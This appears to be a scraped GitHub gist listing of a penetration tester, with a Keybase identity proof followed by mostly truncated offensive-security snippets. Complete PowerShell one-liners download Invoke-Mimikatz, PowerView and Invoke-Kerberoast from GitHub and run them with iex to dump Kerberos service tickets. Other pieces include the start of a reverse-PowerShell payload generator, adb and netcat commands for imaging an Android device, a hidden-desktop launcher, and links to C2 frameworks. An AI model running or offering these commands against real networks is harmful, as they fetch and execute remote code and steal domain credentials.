OlivierLaflamme

Keybase proof

I hereby claim:

• I am olivierlaflamme on github.
• I am olivierlaflamme (https://keybase.io/olivierlaflamme) on keybase.
• I have a public key ASCgiB3TsMKpS01EJ4ltypEUa8ZPzeCtdkxUIDweIzFfNgo

To claim this, I am signing this object:

OlivierLaflamme

ssh -L {LOCAL_PORT}:{HOST}:{REMOTE_PORT} {REMOTE_HOST}

Example
###ssh -L 3001:localhost:3001 username@host

OlivierLaflamme

import json

filenames = []

def findcred(dictionary):
	for k, v in dictionary.items():
		if k == 'password' and dictionary['password']:
			result = {}
			if 'domainname' in dictionary:
				result['domainname'] = dictionary['domainname']

OlivierLaflamme

# Invoke-Mimikatz.ps1
$urls = @("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; $domain=((Get-WmiObject Win32_ComputerSystem).Domain); Add-Type -AssemblyName System.IdentityModel; iex $("setspn.exe -T $domain -Q */*") | Select-String '^CN' -Context 0,1 |% {New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim()}; Invoke-Mimikatz -Command "`"kerberos::list /export`""

# Invoke-Kerberoast.ps1
$urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast

# Invoke-Kerberoast.ps1 - Fix ':$

OlivierLaflamme

#define _GNU_SOURCE
        #include <sched.h>
        #include <unistd.h>
        #include <stdlib.h>
        #include <sys/wait.h>
        #include <signal.h>
        #include <fcntl.h>
        #include <stdio.h>
        #include <string.h>
        #include <limits.h>

OlivierLaflamme

#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#

import sys
import base64

def help():
    print("USAGE: %s IP PORT" % sys.argv[0])

OlivierLaflamme

adb devices
adb push ./nc /sdcard/nc
adb forward tcp:4444 tcp:4444
adb shell
su
cp /sdcard/nc /dev/nc
chmod 777 /dev/nc
dd if=/dev/block/mmblk0 bs 65535 | \ /dev/bc -nvlp 4444
nc -nv 127.0.0.1 4444 > image.nand
sha256sum image.nand

OlivierLaflamme

// To compile: gcc64.exe run.c -o run.exe
// To run:     run.exe cmd.exe "/c whoami"

#include <Windows.h>
#include <stdio.h>

int main(int argc, char **argv) {

    CHAR cDesktop[] = "hiddendesktop";
    HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL);

OlivierLaflamme

client.c

#include <Windows.h>
#include <stdio.h>

#define MAX_SIZE 1024

int main(int argc, char **argv) {
    CHAR *remotePipeName = (CHAR*)GlobalAlloc(GPTR, MAX_SIZE);
    DWORD dwWritten = 0;

OlivierLaflamme

https://raw.githubusercontent.com/FortyNorthSecurity/C2concealer/3630a87e56a1e36ea0d907903fc9b7460419e71f/C2concealer/components/postex.py
https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/Payload_Type/apollo/agent_code/Apollo/CommandModules/SpawnTo.cs
https://raw.githubusercontent.com/kphongagsorn/c2-profiles/29fe50eaad655ddd0028fca06a9c7785e3ffaf41/amazon.profile
https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/documentation-payload/apollo/commands/spawnto_x64.md
https://raw.githubusercontent.com/TheRipperJhon/CAPE/2bc977577a8fcc81a46046fe5bf9248ed3ac0c28/modules/processing/parsers/malwareconfig/CobaltStrike.py
https://raw.githubusercontent.com/Tylous/SourcePoint/7bebe641d9c0d2dbc41c27ef621333f257cbd3e6/Struct/Struct.go
https://raw.githubusercontent.com/MythicAgents/Apollo/92958fc2c9511d738bc1cd2dd44405c650991014/documentation-payload/apollo/opsec.md
https://raw.githubusercontent.com/nsquar3/malware_analysis/e7f3070f4